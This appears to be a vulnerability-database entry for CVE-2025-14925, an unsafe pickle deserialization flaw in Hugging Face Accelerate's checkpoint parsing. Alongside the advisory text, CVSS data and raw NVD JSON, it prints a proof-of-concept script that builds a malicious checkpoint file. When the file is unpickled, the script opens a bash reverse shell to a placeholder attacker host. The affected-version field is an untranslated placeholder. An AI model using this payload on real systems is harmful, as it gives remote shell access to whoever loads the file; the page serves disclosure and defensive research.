CVE-2025-14925

Description

Hugging Face Accelerate Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Accelerate. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27985.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hugging Face Accelerate < 最新修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# 恶意对象，用于在反序列化时执行系统命令
class MaliciousPayload:
    def __reduce__(self):
        # 执行反弹shell命令
        cmd = "bash -i >& /dev/tcp/attacker_ip/port 0>&1"
        return (os.system, (cmd,))

# 创建恶意序列化数据
malicious_data = pickle.dumps(MaliciousPayload())

# 保存为checkpoint文件（模拟攻击场景）
with open('malicious_checkpoint.bin', 'wb') as f:
    f.write(malicious_data)

print("Malicious checkpoint file created: malicious_checkpoint.bin")
print("When loaded by Accelerate, it will execute arbitrary code")

# 漏洞利用演示代码（仅供参考研究）
# from accelerate import load_checkpoint
# checkpoint = load_checkpoint('malicious_checkpoint.bin')  # 触发漏洞

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14925
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14925
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14925/
[4] VulDB https://vuldb.com/cve/CVE-2025-14925
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-1140/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14925", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:47.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Accelerate Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Accelerate. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27985."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1140/", "source": "[email protected]"}]}}